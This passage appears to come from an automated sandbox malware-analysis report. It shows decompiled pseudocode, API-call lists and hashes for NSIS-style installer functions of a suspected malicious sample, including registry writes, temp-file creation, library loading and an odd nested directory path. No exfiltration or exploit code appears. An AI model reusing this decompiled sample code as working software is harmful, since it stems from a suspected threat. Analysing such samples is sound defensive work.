							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E70B215DD( *0x70b25068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E70B22E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E70B22B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E70B22810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x70b21817
0x70b21817
0x70b21817
0x70b21824
0x70b2182c
0x70b21839
0x70b21847
0x70b2184a
0x70b2184c
0x70b21851
0x70b21856
0x70b21978
0x70b21978
0x70b2185c
0x70b21860
0x70b21863
0x70b21868
0x70b21869
0x70b2186a
0x70b21870
0x70b21876
0x70b218a6
0x70b218ad
0x70b218d1
0x70b2191e
0x70b2191f
0x70b218d3
0x70b218d3
0x70b218d4
0x70b218dd
0x70b218de
0x70b218e8
0x70b218eb
0x70b218f0
0x70b218f7
0x70b218f7
0x70b218fd
0x70b218fe
0x70b21904
0x70b2190a
0x70b21917
0x70b21918
0x70b2191b
0x70b218af
0x70b218af
0x70b218b0
0x70b218c5
0x70b218c5
0x70b21929
0x70b2192c
0x70b21939
0x70b21940
0x70b21948
0x70b2194b
0x70b2194b
0x70b21948
0x70b21958
0x70b21960
0x70b21965
0x70b21958
0x70b2196d
0x00000000
0x70b2196f
0x70b21970
0x00000000
0x70b21970
0x70b2196d
0x70b2187a
0x70b2187d
0x70b2189b
0x00000000
0x00000000
0x70b2189e
0x70b218a3
0x70b218a3
0x70b218a5
0x00000000
0x70b218a5
0x70b2187f
0x70b21880
0x70b21888
0x70b21889
0x00000000
0x70b21889
0x70b21882
0x70b21883
0x70b21891
0x00000000
0x70b21891
0x70b21886
0x00000000
0x00000000
0x00000000
0x70b21886

APIs

Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E74
Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E79
Part of subcall function 70B21BFF: GlobalFree.KERNEL32(?), ref: 70B21E7E

GlobalFree.KERNEL32(00000000), ref: 70B218C5
FreeLibrary.KERNEL32(?), ref: 70B2194B
GlobalFree.KERNELBASE(00000000), ref: 70B21970

Part of subcall function 70B2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 70B2246F

Part of subcall function 70B22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70B21896,00000000), ref: 70B228E0

Part of subcall function 70B21666: wsprintfW.USER32 ref: 70B21694

Strings

, xrefs: 70B21951

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 926207219f42a286a9caec3619a74223dfd5b09d1c9bb9ae1d1165ebbe38b406
Instruction ID: 2776247a629d24204cfe6b0055b3f0da43853842aa60beff86222c452952f15c
Opcode Fuzzy Hash: 926207219f42a286a9caec3619a74223dfd5b09d1c9bb9ae1d1165ebbe38b406
Instruction Fuzzy Hash: A441B6B2400241AADB119F20FCC9B9D37ECEF55312F144969F90E9E286EB7497858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp
API String ID: 2655323295-590935851
Opcode ID: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick
API String ID: 1892508949-2621469430
Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 3c7220b09079b7540588f00d06919a83152283317973dfc2410971feeea201ab
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 3c7220b09079b7540588f00d06919a83152283317973dfc2410971feeea201ab
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x0
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x0
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
